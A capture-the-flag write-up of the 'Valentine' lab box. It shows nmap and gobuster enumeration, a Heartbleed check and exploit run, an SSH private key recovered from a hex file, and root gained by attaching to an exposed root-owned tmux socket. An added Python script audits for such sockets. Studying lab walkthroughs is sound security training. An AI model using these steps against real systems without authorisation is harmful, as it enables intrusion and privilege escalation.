Summary

Valentine is an easy Linux box that can be exploited by enumerating the HTTP(S) service properly and identifying that the host is vulnerable to Heartbleed. By exploiting Heartbleed you can obtain a Base64-encoded password that, combined with a private key file, gives an initial foothold on Valentine. The PrivEsc is done by exploiting a Tmux session running as root.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.1.190

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

My automated nmap script flagged the host as potentially vulnerable to Heartbleed. To confirm whether this vulnerability is actually present on the system, the following Nmap scan was executed:

nmap --script=ssl-heartbleed -p 443  10.129.1.190
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-10 19:39 CET
Nmap scan report for 10.129.1.190
Host is up (0.012s latency).

PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High

Indeed, Nmap indicated the system is vulnerable to Heartbleed.


Exploitation

In order to exploit this, a Python script (heartbleed.py) was used. The script can be executed as follows: python2.7 heartbleed.py -n 10 10.129.1.190 -v
It is worth mentioning that it may be necessary to execute it several times. For me, I instantly got an encoded string as shown below:

By this time, Gobuster had finished running as well and discovered the following files/directories:

===============================================================
2021/02/10 19:36:34 Starting gobuster
===============================================================
http://10.129.1.190/dev (Status: 301)
http://10.129.1.190/index (Status: 200)
http://10.129.1.190/encode.php (Status: 200)
http://10.129.1.190/decode.php (Status: 200)
http://10.129.1.190/omg (Status: 200)
http://10.129.1.190/server-status (Status: 403)

When navigating to decode.php, the string obtained from exploiting the Heartbleed vulnerability was entered:

Authenticating with these credentials over SSH as the user Hype was unsuccessful. When navigating to the /dev location discovered earlier, the following directory listing was shown:

The hype_key file contains a large hex-encoded output. This was decoded as shown below:

It contains an RSA private key. The following command was used to re-authenticate over SSH using this newly obtained private key:


Privilege Escalation

I always like to start by running Linpeas. It discovered the following:

This colour coding indicates a vulnerability that can most likely be exploited. Let’s navigate to this file:

The user Hype does not have permissions to change or read this file (a root-owned Tmux server socket), so let's try to attach to it:

/usr/bin/tmux -S dev_sess

This instantly provides a root shell in a new Tmux window, because Tmux attaches to whatever session the server behind that socket is running, and that server runs as root.

root@Valentine:/.devs# whoami && hostname
root
Valentine
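The exposed root-owned Tmux socket above is something a defender can check for: connecting to a Unix socket requires write permission on the socket file, so a root-owned socket with group/other write bits is reachable by any local user. The audit below is an added example written for this writeup, not code from the box or from Linpeas; the directory, socket names and the simulated "other user" uid are constructed for the demonstration.

```python
import os
import socket
import stat
import tempfile

# Connecting to a Unix-domain socket needs write permission on the socket
# file, so group/other write bits are the signal that another user can attach.
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def find_exposed_sockets(directory, viewer_uid):
    """Return (path, owner_uid, mode) for Unix sockets in `directory` that are
    owned by a user other than `viewer_uid` yet writable by group or other."""
    exposed = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISSOCK(st.st_mode):
            continue
        if st.st_uid != viewer_uid and st.st_mode & WRITABLE_BY_OTHERS:
            exposed.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return exposed


def make_socket(path, mode):
    """Create a bound Unix socket file with the given permission bits
    (helper for the constructed scenario; the file persists after close)."""
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(path)
    os.chmod(path, mode)
    return s


def demo(viewer_uid=None):
    """Constructed scenario: a world-writable 'dev_sess' socket next to a
    properly restricted 0700 socket, audited as a different (simulated) user
    so the socket owner differs from the viewer. Returns the flagged names."""
    workdir = tempfile.mkdtemp(prefix="devs_")
    for name, mode in (("dev_sess", 0o777), ("private_sess", 0o700)):
        make_socket(os.path.join(workdir, name), mode).close()
    if viewer_uid is None:
        viewer_uid = os.getuid() + 1  # assumption: simulate another local user
    return [os.path.basename(p) for p, _, _ in find_exposed_sockets(workdir, viewer_uid)]


if __name__ == "__main__":
    print(demo())  # ['dev_sess']
```

Running the audit against the real directory with viewer_uid set to a low-privileged account's uid lists sockets that account could attach to; a Tmux server socket should be 0700 inside a per-user directory.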

Conclusion

This was a very easy box and I like the Heartbleed vulnerability for Valentines :) By running automated enumeration scripts and identifying the Heartbleed vulnerability, it was relatively obvious that the leaked string needed to be decoded. The hype_key was also quite obviously a file that needed to be converted from hex to text, and this was very straightforward. The privesc was really easy and can be found by utilising automated scripts such as Linpeas. I enjoyed this easy box. Hope you enjoyed this writeup!